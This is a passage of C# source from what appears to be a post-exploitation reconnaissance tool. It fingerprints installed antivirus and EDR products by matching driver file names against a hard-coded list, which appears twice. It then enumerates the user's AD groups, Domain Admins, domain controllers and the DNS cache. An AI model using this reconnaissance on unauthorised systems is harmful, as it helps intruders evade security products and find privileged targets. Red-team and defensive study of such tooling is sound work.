if (file.Name == "CyOptics.sys" || file.Name == "CyProtectDrv32.sys" || file.Name == "CyProtectDrv64.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Cylance found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "aswSP.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Avast found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "mfeaskm.sys" || file.Name == "mfencfilter.sys" || file.Name == "epdrv.sys" || file.Name == "mfencoas.sys" || file.Name == "mfehidk.sys" || file.Name == "swin.sys" || file.Name == "hdlpflt.sys" || file.Name == "mfprom.sys" || file.Name == "MfeEEFF.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("McAfee found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "groundling32.sys" || file.Name == "groundling64.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Dell Secureworks found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "avgtpx86.sys" || file.Name == "avgtpx64.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("AVG Technologies found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "pgpwdefs.sys" || file.Name == "GEProtection.sys" || file.Name == "diflt.sys" || file.Name == "sysMon.sys" || file.Name == "ssrfsf.sys" || file.Name == "emxdrv2.sys" || file.Name == "reghook.sys" || file.Name == "spbbcdrv.sys" || file.Name == "bhdrvx86.sys" || file.Name == "bhdrvx64.sys" || file.Name == "SISIPSFileFilter.sys" || file.Name == "symevent.sys" || file.Name == "vxfsrep.sys" || file.Name == "vxfsrep.sys" || file.Name == "VirtFile.sys" || file.Name == "SymAFR.sys" || file.Name == "symefasi.sys" || file.Name == "symefa.sys" || file.Name == "symefa64.sys" || file.Name == "SymHsm.sys" || file.Name == "evmf.sys" || file.Name == "GEFCMP.sys" || file.Name == "VFSEnc.sys" || file.Name == "pgpfs.sys" || file.Name == "fencry.sys" || file.Name == "symrg.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Symantec found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "SAFE-Agent.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("SAFE-Cyberdefense found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CybKernelTracker.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("CyberArk Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "klifks.sys" || file.Name == "klifaa.sys" || file.Name == "Klifsm.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Kaspersky found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "SAVOnAccess.sys" || file.Name == "savonaccess.sys" || file.Name == "sld.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Sophos found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "ssfmonm.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Webroot Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CarbonBlackK.sys" || file.Name == "carbonblackk.sys" || file.Name == "cbk7.sys" || file.Name == "cbstream.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Carbon Black found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "Parity.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Bit9 Whitelisting Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CRExecPrev.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Cybereason found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "im.sys" || file.Name == "csagent.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Crowdstrike found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "cfrmd.sys" || file.Name == "cmdccav.sys" || file.Name == "cmdguard.sys" || file.Name == "CmdMnEfs.sys" || file.Name == "MyDLPMF.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Comodo Security Solutions found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "PSINPROC.SYS" || file.Name == "PSINFILE.SYS" || file.Name == "amfsm.sys" || file.Name == "amm8660.sys" || file.Name == "amm6460.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Panda Security found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "fsgk.sys" || file.Name == "fsatp.sys" || file.Name == "fshs.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("F-Secure found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "esensor.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Engame found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "csacentr.sys" || file.Name == "csaenh.sys" || file.Name == "csareg.sys" || file.Name == "csascr.sys" || file.Name == "csaav.sys" || file.Name == "csaam.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Cisco found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "TMUMS.sys" || file.Name == "hfileflt.sys" || file.Name == "TMUMH.sys" || file.Name == "AcDriver.sys" || file.Name == "SakFile.sys" || file.Name == "SakFile.sys" || file.Name == "SakMFile.sys" || file.Name == "fileflt.sys" || file.Name == "TmEsFlt.sys" || file.Name == "tmevtmgr.sys" || file.Name == "TmFileEncDmk.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Trend Micro Inc found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "epregflt.sys" || file.Name == "medlpflt.sys" || file.Name == "dsfa.sys" || file.Name == "cposfw.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Check Point Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "psepfilter.sys" || file.Name == "cve.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Absolute found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "brfilter.sys" || file.Name == "BrCow_x_x_x_x.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Bromium found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "LRAgentMF.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("LogRhythm found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "libwamf.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("OPSWAT Inc found!");
Console.ForegroundColor = ConsoleColor.White;
}
}
}
else
{
DirectoryInfo driversdir = new DirectoryInfo(@"c:\windows\system32\drivers");
FileInfo[] listb = driversdir.GetFiles("*.sys");
foreach (FileInfo file in listb)
{
if (file.Name == "FeKern.sys" || file.Name == "WFP_MRT.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("FireEye found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "eaw.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Raytheon Cyber Solutions found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "rvsavd.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("CJSC Returnil Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "dgdmk.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Verdasys Inc. found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "mbamwatchdog.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Malwarebytes found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "edevmon.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("ESET found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "SentinelMonitor.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("SentinelOne found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "edrsensor.sys" || file.Name == "hbflt.sys" || file.Name == "bdsvm.sys" || file.Name == "gzflt.sys" || file.Name == "bddevflt.sys" || file.Name == "AVCKF.sys" || file.Name == "Atc.sys" || file.Name == "AVC3.SYS" || file.Name == "TRUFOS.SYS" || file.Name == "BDSandBox.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("BitDefender found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "HexisFSMonitor.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Hexis Cyber Solutions found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CyOptics.sys" || file.Name == "CyProtectDrv32.sys" || file.Name == "CyProtectDrv64.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Cylance found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "aswSP.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Avast found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "mfeaskm.sys" || file.Name == "mfencfilter.sys" || file.Name == "epdrv.sys" || file.Name == "mfencoas.sys" || file.Name == "mfehidk.sys" || file.Name == "swin.sys" || file.Name == "hdlpflt.sys" || file.Name == "mfprom.sys" || file.Name == "MfeEEFF.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("McAfee found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "groundling32.sys" || file.Name == "groundling64.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Dell Secureworks found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "avgtpx86.sys" || file.Name == "avgtpx64.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("AVG Technologies found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "pgpwdefs.sys" || file.Name == "GEProtection.sys" || file.Name == "diflt.sys" || file.Name == "sysMon.sys" || file.Name == "ssrfsf.sys" || file.Name == "emxdrv2.sys" || file.Name == "reghook.sys" || file.Name == "spbbcdrv.sys" || file.Name == "bhdrvx86.sys" || file.Name == "bhdrvx64.sys" || file.Name == "SISIPSFileFilter.sys" || file.Name == "symevent.sys" || file.Name == "vxfsrep.sys" || file.Name == "vxfsrep.sys" || file.Name == "VirtFile.sys" || file.Name == "SymAFR.sys" || file.Name == "symefasi.sys" || file.Name == "symefa.sys" || file.Name == "symefa64.sys" || file.Name == "SymHsm.sys" || file.Name == "evmf.sys" || file.Name == "GEFCMP.sys" || file.Name == "VFSEnc.sys" || file.Name == "pgpfs.sys" || file.Name == "fencry.sys" || file.Name == "symrg.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Symantec found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "SAFE-Agent.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("SAFE-Cyberdefense found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CybKernelTracker.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("CyberArk Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "klifks.sys" || file.Name == "klifaa.sys" || file.Name == "Klifsm.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Kaspersky found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "SAVOnAccess.sys" || file.Name == "savonaccess.sys" || file.Name == "sld.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Sophos found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "ssfmonm.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Webroot Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CarbonBlackK.sys" || file.Name == "carbonblackk.sys" || file.Name == "cbk7.sys" || file.Name == "cbstream.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Carbon Black found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "Parity.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Bit9 Whitelisting Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "CRExecPrev.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Cybereason found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "im.sys" || file.Name == "csagent.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Crowdstrike found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "cfrmd.sys" || file.Name == "cmdccav.sys" || file.Name == "cmdguard.sys" || file.Name == "CmdMnEfs.sys" || file.Name == "MyDLPMF.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Comodo Security Solutions found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "PSINPROC.SYS" || file.Name == "PSINFILE.SYS" || file.Name == "amfsm.sys" || file.Name == "amm8660.sys" || file.Name == "amm6460.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Panda Security found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "fsgk.sys" || file.Name == "fsatp.sys" || file.Name == "fshs.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("F-Secure found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "esensor.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Engame found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "csacentr.sys" || file.Name == "csaenh.sys" || file.Name == "csareg.sys" || file.Name == "csascr.sys" || file.Name == "csaav.sys" || file.Name == "csaam.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Cisco found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "TMUMS.sys" || file.Name == "hfileflt.sys" || file.Name == "TMUMH.sys" || file.Name == "AcDriver.sys" || file.Name == "SakFile.sys" || file.Name == "SakFile.sys" || file.Name == "SakMFile.sys" || file.Name == "fileflt.sys" || file.Name == "TmEsFlt.sys" || file.Name == "tmevtmgr.sys" || file.Name == "TmFileEncDmk.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Trend Micro Inc found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "epregflt.sys" || file.Name == "medlpflt.sys" || file.Name == "dsfa.sys" || file.Name == "cposfw.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Check Point Software found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "psepfilter.sys" || file.Name == "cve.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Absolute found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "brfilter.sys" || file.Name == "BrCow_x_x_x_x.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Bromium found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "LRAgentMF.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("LogRhythm found!");
Console.ForegroundColor = ConsoleColor.White;
}
if (file.Name == "libwamf.sys")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("OPSWAT Inc found!");
Console.ForegroundColor = ConsoleColor.White;
}
}
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] AD Group Info for user {0}:", Environment.UserName);
Console.ForegroundColor = ConsoleColor.White;
PrincipalContext context = new PrincipalContext(ContextType.Domain);
UserPrincipal usr = UserPrincipal.FindByIdentity(context, Environment.UserName);
PrincipalSearchResult <Principal> groups = usr.GetAuthorizationGroups();
foreach (GroupPrincipal g in groups)
{
Console.WriteLine(g.Name);
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] Domain Admins:");
Console.ForegroundColor = ConsoleColor.White;
PrincipalContext context2 = new PrincipalContext(ContextType.Domain);
GroupPrincipal domadmins = GroupPrincipal.FindByIdentity(context2, "domain admins");
foreach (Principal h in domadmins.GetMembers())
{
Console.WriteLine(h.SamAccountName);
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
try
{
Console.ForegroundColor = ConsoleColor.Yellow;
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
Console.WriteLine("[+] Domain Controllers for {0}:", domain);
Console.ForegroundColor = ConsoleColor.White;
System.DirectoryServices.ActiveDirectory.Domain dom = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain();
foreach (System.DirectoryServices.ActiveDirectory.DomainController dc in dom.DomainControllers)
{
Console.WriteLine("DC Name: " + dc.Name);
Console.WriteLine(" [+] IP Address: " + dc.IPAddress);
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
Console.WriteLine("");
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] DNS Cache Host Entries:");
Console.ForegroundColor = ConsoleColor.White;
DNS cacher = new DNS();
cacher.run();
}
